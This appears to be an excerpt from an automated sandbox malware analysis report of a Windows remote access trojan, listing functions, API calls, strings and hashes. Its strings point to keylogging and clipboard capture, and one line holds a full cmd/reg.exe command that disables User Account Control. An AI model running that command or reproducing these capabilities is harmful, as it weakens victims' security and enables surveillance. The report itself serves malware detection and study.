                                                    • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                    • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                    Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                    • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                    • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                    • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                    • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                    Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                    • _free.LIBCMT ref: 00446F06
                                                    • _free.LIBCMT ref: 00446F2E
                                                    • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                    • _abort.LIBCMT ref: 00446F4D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                    • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                    • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                    • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                    Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    • API String ID: 221034970-0
                                                    • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                    • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                    • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                    • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                    Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    • API String ID: 221034970-0
                                                    • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                    • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                    • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                    • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                    Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    • API String ID: 221034970-0
                                                    • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                    • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                    • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                    • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                    Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Enum$InfoQueryValue
                                                    • String ID: [regsplt]$DG
                                                    • API String ID: 3554306468-1089238109
                                                    • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                    • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                    • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                    • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                    Function 0044D469 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _strpbrk.LIBCMT ref: 0044D4B8
                                                    • _free.LIBCMT ref: 0044D5D5
                                                      • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,?,?,00401962,?,?,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                                      • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A888
                                                      • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                    • String ID: *?$.$Zb1Y/
                                                    • API String ID: 2812119850-846405920
                                                    • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                    • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                                    • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                    • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                                    Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                    • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                    • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                    • API String ID: 2974294136-4018440003
                                                    • Opcode ID: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                    • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                    • Opcode Fuzzy Hash: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                    • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                    Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • wsprintfW.USER32 ref: 0040A905
                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EventLocalTimewsprintf
                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                    • API String ID: 1497725170-248792730
                                                    • Opcode ID: ac93d5049eb4af2d3ff39b2439aaec6a6b37fc1dbf617edc53c21c1fd14495f1
                                                    • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                    • Opcode Fuzzy Hash: ac93d5049eb4af2d3ff39b2439aaec6a6b37fc1dbf617edc53c21c1fd14495f1
                                                    • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                    Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                    • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                    • String ID: `AG
                                                    • API String ID: 1958988193-3058481221
                                                    • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                    • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                    • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                    • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                    Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                    • GetLastError.KERNEL32 ref: 0041CAA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                    • String ID: 0$MsgWindowClass
                                                    • API String ID: 2877667751-2410386613
                                                    • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                    • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                    • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                    • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                    Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                    • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                    • CloseHandle.KERNEL32(?), ref: 00406A14
                                                    Strings
                                                    • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$CreateProcess
                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                    • API String ID: 2922976086-4183131282
                                                    • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                    • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                    • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                    • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                    Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B90,0040483F,00000001,?,?,00000000,00475B90,004017F3), ref: 00404AED
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404AF9
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404B04
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404B0D
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                    • String ID: KeepAlive | Disabled
                                                    • API String ID: 2993684571-305739064
                                                    • Opcode ID: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                    • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                    • Opcode Fuzzy Hash: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                    • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                    Function 00419F42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                    • Sleep.KERNEL32(00002710), ref: 00419F89
                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                    • String ID: Alarm triggered
                                                    • API String ID: 614609389-2816303416
                                                    • Opcode ID: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                    • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                    • Opcode Fuzzy Hash: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                    • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                    Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                    Strings
                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                    • API String ID: 3024135584-2418719853
                                                    • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                    • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                    • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                    • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                    Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                    • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                    • String ID:
                                                    • API String ID: 3525466593-0
                                                    • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                    • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                    • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                    • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                    Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                      • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 4269425633-0
                                                    • Opcode ID: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                    • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                    • Opcode Fuzzy Hash: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                    • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                    Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                    • _free.LIBCMT ref: 0044E1B0
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
